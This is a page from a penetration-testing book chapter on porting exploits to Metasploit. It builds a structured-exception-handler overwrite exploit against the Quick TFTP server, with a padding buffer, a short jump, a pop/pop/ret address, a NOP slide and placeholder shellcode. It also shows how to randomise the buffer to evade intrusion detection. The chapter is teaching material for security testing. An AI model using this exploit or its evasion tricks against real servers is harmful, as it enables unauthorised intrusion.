background image

Porting Exploits to the Metasploit Framework

229

sploit = "\x00\x02"

       sploit << "pwnd"
       sploit << "\x00"
       sploit << evil
       sploit << "\x00"

       udp_sock.put(sploit)

       disconnect_udp
end

Following the initial string of 

A

s (1019 of them, represented by 

\x41

 in hexa-

decimal), we add a short jump at   to overwrite the Next SE Handler (NSEH). 
At the beginning of this chapter, we used a simple stack overflow example when 
we attacked MailCarrier and overwrote the instruction pointer. Here, we over-
write the SEH and the NSEH to break out of the structured exception handler. 
Then at   we add the address of a 

POP-POP-RETN 

sequence of instructions to 

overwrite SEH, which puts us into an area of memory that we control.

Next, to make sure that the packet will be recognized as a write request 

by the TFTP server, we append 

\x00\x02

 after the shellcode at  . 

Now, when we load the module and run it against our target, our debugger 

should pause with a SEH overwrite, as shown in Figure 15-4.

Figure 15-4: Quick TFTP's initial SEH overwrite

Because that long string of 

A

s and the NOP slide sent to the application 

will set off IDS alarms, we’ll replace the 

A

s (as in the previous example) with 

a random selection of uppercase alphabetic characters, and replace the 

\x90

 

characters with NOP equivalents, as shown in the following boldface code:

evil = 

rand_text_alpha_upper(1019

)   # Was: "\x41" * 1019

evil << "\xeb\x08\x90\x90"           # Short Jump
evil << "\x58\x14\xd3\x74"           # pop/pop/ret
evil << 

make_nops(16)

                # Was: "\x90" * 16  # NOP slide

evil << "\xcc" * 412                 # Dummy Shellcode

As always, it’s a good idea to check your new module’s functionality after 

every change. As you can see in Figure 15-5, the random characters have been 
accepted by the application and SEH is still controlled as it was before.